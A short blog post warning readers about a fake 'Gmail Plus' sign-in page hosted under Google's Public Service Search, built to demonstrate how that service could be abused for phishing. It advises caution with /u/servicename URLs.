I found a question this morning on Ask MetaFilter about a supposed new service called Gmail Plus. The URL, www.google.com/u/gplus, looked legit. In my pre-caffeinated state, I almost entered my Google username and password to see what sort of pre-announced Google service this MeFi-er had turned up. Instead, I went ahead and checked the comments and found that signing in would have been a very, very bad idea.
Turns out, it's a page created by Farraro to demonstrate a potential exploit in Google's Public Service Search:
This service is meant for universities or other non-profit organizations to add a 'Google' search to their website. It differs from the other free Google site search in that it allows you to customize the header and footer of the search results page. It's interesting to note that the code for your header and footer is actually hosted by Google, on their server.
Most phishing scams have a suspicious URL that an alert (or sometimes even semi-alert) user can spot easily. With the Google Public Service Search, though, users may not think anything of a service being hosted on Google itself. The "u/servicename" URL just doesn't look all that odd unless you're already familiar with the Public Service offering.
Farraro says he's notified Google security about the bug, but in the meantime, it would pay to be very careful, and avoid providing your Google credentials to any Google services with the /u/servicename construction.